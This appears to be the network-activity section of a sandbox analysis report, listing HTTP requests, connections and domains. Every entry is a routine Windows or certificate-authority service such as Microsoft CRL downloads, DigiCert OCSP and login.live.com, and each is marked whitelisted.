4168 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 23.48.23.194:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6240 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6240 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1268 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1688 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 192.168.100.255:138 | — | — | — | whitelisted |
2336 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
4168 | svchost.exe | 40.126.32.136:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4168 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1268 | svchost.exe | 23.48.23.194:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |